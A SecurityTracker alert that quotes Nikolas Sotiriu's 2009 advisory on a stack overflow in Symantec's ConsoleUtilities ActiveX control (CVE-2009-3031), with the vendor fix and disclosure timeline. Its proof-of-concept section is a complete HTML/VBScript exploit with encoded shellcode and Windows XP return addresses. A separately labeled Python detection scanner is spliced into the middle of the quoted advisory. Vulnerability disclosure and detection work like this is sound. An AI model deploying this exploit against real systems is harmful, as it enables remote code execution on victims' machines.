Symantec Altiris Deployment Server Stack Overflow in ConsoleUtilities ActiveX Control Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID: 1023122
SecurityTracker URL: http://securitytracker.com/id/1023122
CVE Reference: CVE-2009-3031
Date: Nov 3 2009
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes
Vendor Confirmed: Yes
Version(s): 6.8, 6.9
Description:
A vulnerability was reported in Symantec Altiris Deployment Server. A remote user can cause arbitrary code to be executed on the target user's system.
A remote user can create specially crafted HTML that, when loaded by the target user, will invoke the Symantec ConsoleUtilities ActiveX control ('AeXNSConsoleUtilities.dll') and trigger a stack overflow to execute arbitrary code on the target system. The code will run with the privileges of the target user.
Version 6.0.0.1846 of the ActiveX control is affected.
The CLSID of the vulnerable control is: B44D252D-98FC-4D5C-948C-BE868392A004
Symantec Altiris Notification Server and Symantec Management Platform are also affected.
The vendor was notified on September 15, 2009.
Nikolas Sotiriu reported this vulnerability.
The original advisory is available at:
http://sotiriu.de/adv/NSOADV-2009-001.txt
Impact:
A remote user can create HTML that, when loaded by the target user, will execute arbitrary code on the target user's system.
Solution:
The vendor has issued a fix.
A fix is also available for Symantec Altiris Notification Server and Symantec Management Platform.
The vendor's advisories are available at:
http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00
https://kb.altiris.com/article.asp?article=49568&p=1
Vendor URL: www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00
Cause:
Boundary error
Underlying OS:
Windows (Any)
Message History:
None.
Source Message Contents
Date: Mon, 02 Nov 2009 21:14:46 +0100
Subject: NSOADV-2009-001: Symantec ConsoleUtilities ActiveX Control Buffer Overflow
_________________________________________
Security Advisory NSOADV-2009-001
_________________________________________
Title: Symantec ConsoleUtilities ActiveX Control Buffer Overflow
Severity: Critical
Advisory ID: NSOADV-2009-001
Found Date: 09.09.2009
Date Reported: 15.09.2009
Release Date: 02.11.2009
Author: Nikolas Sotiriu
Mail: nso-research at sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2009-001.txt
Vendor: Symantec (http://www.symantec.com/)
Affected Products: Symantec Altiris Notification Server 6.x
                   Symantec Management Platform 7.0.x
                   Symantec Altiris Deployment Solution 6.9.x
Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.1846
Not Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.2000
Remote Exploitable: Yes
Local Exploitable: No
CVE-ID: CVE-2009-3031
Patch Status: Vendor released a patch
Discovered by: Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller, for the permission to use his policy
Background:
===========
Altiris service-oriented management solutions provide a modular and
future-proof approach to managing highly diverse and widely distributed
IT infrastructures. They are open solutions that enable lifecycle
integration of client, handheld, server, network and other IT assets
with audit-ready security and automated operation.
(Product description from Symantec Website)
Description:
============
On first access to the Management Website, an ActiveX control
(AeXNSConsoleUtilities.dll) is installed; its "BrowseAndSaveFile" method
is vulnerable to a stack-based buffer overflow.
Name: ConsoleUtilities Class
Vendor: Altiris, Inc.
Type: ActiveX control
Version: 6.0.0.1846
GUID: {B44D252D-98FC-4D5C-948C-BE868392A004}
File: AeXNSConsoleUtilities.dll
Folder: C:\WINDOWS\system32
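As an added defensive example (not from the advisory and not Symantec's or Altiris's code), the following Python content-filter check, of the kind a proxy or mail gateway might run, flags HTML that instantiates the CLSID above and calls the BrowseAndSaveFile method; the two sample documents are constructed for this example.

```python
import re
from html.parser import HTMLParser

VULN_CLSID = "B44D252D-98FC-4D5C-948C-BE868392A004"  # CLSID from the advisory
VULN_METHOD = "BrowseAndSaveFile"                      # overflowing method, from the advisory


class ConsoleUtilitiesScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "object":
            for name, value in attrs:
                # classid is written "clsid:..." and is compared case-insensitively
                if name == "classid" and value and VULN_CLSID in value.upper():
                    self.findings.append("object instantiates CLSID " + VULN_CLSID)
        elif tag == "script":
            self._in_script = True  # script bodies are delivered to handle_data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and re.search(VULN_METHOD, data, re.IGNORECASE):
            self.findings.append("script calls " + VULN_METHOD)


def scan_html(document):
    """Return the findings for one HTML document (empty list if clean)."""
    scanner = ConsoleUtilitiesScanner()
    scanner.feed(document)
    scanner.close()
    return scanner.findings


def is_exploit_attempt(document):
    """True only when the control is instantiated AND the method is called; the
    legitimate Altiris console also loads this control, so the CLSID alone is not evidence."""
    found = scan_html(document)
    return any("CLSID" in f for f in found) and any("calls" in f for f in found)


# Constructed samples: one shaped like the advisory's PoC (no payload), one benign.
SUSPECT_HTML = ('<html><object classid="clsid:b44d252d-98fc-4d5c-948c-be868392a004" id="obj"></object>'
                '<script language="vbscript">obj.BrowseAndSaveFile "", String(400, "A"), "", "", ""'
                '</script></html>')
BENIGN_HTML = ('<html><object classid="clsid:00000000-0000-0000-0000-000000000000"></object>'
               '<script>document.title = "nothing to see";</script></html>')
```

Pages served by the management console itself will legitimately contain the CLSID, so a deployed filter should combine this check with the page's origin.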
Proof of Concept:
=================
<html>
<title>NSOADV-2009-001</title>
<object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='obj'/>
</object>
<script language='vbscript'>
Sub Submit_OnClick
For i=0 to 2
If document.ret.os(i).checked Then
target=document.ret.os(i).value
End If
Next
EIP=unescape(target)
arg1 = ""
arg3 = ""
arg4 = ""
arg5 = ""
junk=String(310, "A") 'junk
morejunk=String(18, unescape("%u0041")) 'more junk
// windows/exec - 224 bytes
// http://www.metasploit.com
// Encoder: x86/call4_dword_xor
// EXITFUNC=seh, CMD=calc.exe
code=unescape("%uc92b%ue983%ue8ce%uffff%uffff%u5ec0%u7681%ue60e"&_
"%u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d"&_
"%u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f"&_
"%u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d"&_
"%ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c"&_
"%ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875"&_
"%u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981"&_
"%ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58"&_
"%u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe"&_
"%u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2"&_
"%uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d"&_
"%uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b"&_
"%u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a"&_
"%uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848")
buf=junk+EIP+morejunk+break+code
obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5
End Sub
</script>
<h2>Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC</h2>
Use it only for education or ethical pentesting! The author accepts no
liability for damage caused by this tool.<br>Nikolas Sotiriu (lofi)
(http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009<br>
<h3>Some RET Infos:</h3>
Overwrite EIP with AAAA (crash)<br>
EIP=String(2, unescape("%u4141"))<br><br>
XP SP2 Ger shell32.dll JMP ESP<br>
EIP=unescape("%uaf0a%u77d5")<br><br>
XP SP3 Ger shell32.dll JMP ESP<br>
EIP=unescape("%u30D7%u7E68")<br><br>
----------------------------------------------------------------
<form name="ret">
<input type=radio name="os" value="%u4141%u4141">
DoS<br>
<input type=radio name="os" value="%uaf0a%u77d5">
Windows XP SP2 German<br>
<input type=radio name="os" value="%u30D7%u7E68">
Windows XP SP3 German<br>
<input type=button name="Submit" VALUE="Exploit">
</form>
<img src="http://sotiriu.de/images/logo_wh_80.png">
</html>
Solution:
=========
Symantec Security Advisory:
http://tinyurl.com/y9fakve
Hotfix (KB49568): Deployment Solution 6.9 SP3
https://kb.altiris.com/display/1n/articleDirect/index.asp?aid=49568
Hotfix (KB49389): Notification Server 6.x and Symantec Management Platform 7.x
https://kb.altiris.com/display/1n/articleDirect/index.asp?aid=49389
Disclosure Timeline (YYYY/MM/DD):
=================================
2009.09.09: Vulnerability found
2009.09.15: Sent PoC, Advisory, Disclosure policy and planned disclosure date (2009.10.01) to Vendor
2009.09.15: Vendor response asking for resending the PoC in a zipped and password protected file (AV problem)
2009.09.15: Resending zipped and password protected
2009.09.17: Symantec Security Response Team verifies the vulnerability
2009.09.22: Symantec product team verifies the finding
2009.09.29: Ask for a status update, because the planned release date is 2009.10.01.
2009.09.29: Symantec Security Response Team tries to get a time line from the product team.
2009.09.30: Changed release date to 2009.10.08 until a time line is known
2009.10.07: Ask for a status update, because the planned release date is 2009.10.08.
2009.10.07: Symantec Security Response Team informs me if all goes well they need one more week.
2009.10.07: Changed release date to 2009.10.15.
2009.10.14: Ask for a status update, because the planned release date is 2009.10.15.
2009.10.14: Symantec Security Response Team informs me that they have an issue with an update and they need one more week.
2009.10.14: Changed release date to 2009.10.22.
2009.10.21: Ask for a status update, because the planned release date is 2009.10.22.
2009.10.21: Symantec Security Response Team informs me that they have an issue with an update.
2009.10.21: Changed release date to 2009.10.29.
2009.10.28: Ask for a status update, because the planned release date is 2009.10.29.
2009.10.29: Symantec Security Response Team informs me that the patch will be released on 2009.11.02 at 9am PST.
2009.11.02: Symantec Security Response Team informs me that the patch and the Advisory are released.
2009.11.02: Release of this Advisory